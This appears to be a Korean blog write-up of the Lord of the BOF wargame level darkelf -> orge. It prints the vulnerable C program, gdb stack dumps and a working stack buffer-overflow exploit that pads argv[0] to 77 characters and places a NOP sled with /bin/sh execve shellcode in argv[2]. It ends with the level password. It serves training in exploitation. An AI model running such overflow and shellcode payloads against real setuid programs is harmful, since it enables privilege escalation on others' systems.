[LOB] darkelf -> orge
2019. 7. 29. 00:13ㆍWargame & CTF/LOB
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 | /* The Lord of the BOF : The Fellowship of the BOF - orge - check argv[0] */ #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); } // here is changed! if(strlen(argv[0]) != 77){ printf("argv[0] error\n"); exit(0); } // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47] != '\xbf') { printf("stack is still your friend.\n"); exit(0); } // check the length of argument if(strlen(argv[1]) > 48){ printf("argument is too long!\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); } | cs |
argv[1]이 77자인지 검사한다. 만약에 아니라면 exit(0); 한다.
[buffer(40)][SFP(4)][RET(4)]
buffer를 0으로 초기화 하기 때문에, 이번에도 argv[2]에다가 쉘코드를 넣어주고, argv[0]을 77자로 맞춰주면 된다.
우리는 대부분 ./FILENAME으로 프로그램을 실행하니, ./를 포함해서 77자로 맞추어야 한다.
argv[0]은 파일 이름이다. 심볼릭 링크를 이용해도 되지만, 마음 편하게 파일 이름을 바꾸겠다.
1 2 3 | [darkelf@localhost darkelf]$ mv orge `python -c 'print "A"*75'` [darkelf@localhost darkelf]$ ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA orge.c tmp | cs |
잘 바뀌었다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 | [darkelf@localhost tmp]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ Segmentation fault (core dumped) [darkelf@localhost tmp]$ gdb -q AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA core warning: core file may not match specified executable file. Core was generated by `./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0xbfbfbfbf in ?? () (gdb) x/80x $esp 0xbffff600: 0x00000000 0xbffff644 0xbffff654 0x40013868 0xbffff610: 0x00000003 0x08048450 0x00000000 0x08048471 0xbffff620: 0x08048500 0x00000003 0xbffff644 0x08048390 0xbffff630: 0x0804866c 0x4000ae60 0xbffff63c 0x40013e90 0xbffff640: 0x00000003 0xbffff747 0xbffff795 0xbffff7c6 0xbffff650: 0x00000000 0xbffffbc8 0xbffffbde 0xbffffbf6 0xbffff660: 0xbffffc15 0xbffffc37 0xbffffc49 0xbffffc56 0xbffff670: 0xbffffe19 0xbffffe38 0xbffffe52 0xbffffe67 0xbffff680: 0xbffffe7c 0xbffffe87 0xbffffea0 0xbffffeb0 0xbffff690: 0xbffffeb8 0xbffffec9 0xbffffed7 0xbffffee5 0xbffff6a0: 0xbffffef6 0xbfffff04 0xbfffff0f 0xbfffff22 0xbffff6b0: 0xbfffff5e 0x00000000 0x00000003 0x08048034 0xbffff6c0: 0x00000004 0x00000020 0x00000005 0x00000006 0xbffff6d0: 0x00000006 0x00001000 0x00000007 0x40000000 0xbffff6e0: 0x00000008 0x00000000 0x00000009 0x08048450 0xbffff6f0: 0x0000000b 0x000001fa 0x0000000c 0x000001fa 0xbffff700: 0x0000000d 0x000001fa 0x0000000e 0x000001fa 0xbffff710: 0x00000010 0x0f8bfbff 0x0000000f 0xbffff742 0xbffff720: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff730: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb) 0xbffff740: 0x36690000 0x2e003638 0x4141412f 0x41414141 0xbffff750: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff760: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff770: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff780: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff790: 0x41414141 0x41414100 0x41414141 0x41414141 0xbffff7a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff7b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff7c0: 0xbfbfbf41 0x909000bf 0x90909090 0x90909090 0xbffff7d0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff7e0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff7f0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff800: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff810: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff820: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff830: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff840: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff850: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff860: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff870: 0x90909090 0x90909090 0x90909090 0x90909090 | cs |
이번에도 NOP SLED를 사용할 것이다.
1 2 3 4 5 | [darkelf@localhost darkelf]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44+"\x01\xf8\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ my-pass euid = 507 timewalker | cs |
orge : timewalker
'Wargame & CTF > LOB' 카테고리의 다른 글
| [LOB] troll -> vampire (0) | 2019.07.29 |
|---|---|
| [LOB] orge -> troll (0) | 2019.07.29 |
| [LOB] wolfman -> darkelf (0) | 2019.07.28 |
| [LOB] orc -> wolfman (0) | 2019.07.28 |
| [LOB] goblin -> orc (0) | 2019.07.28 |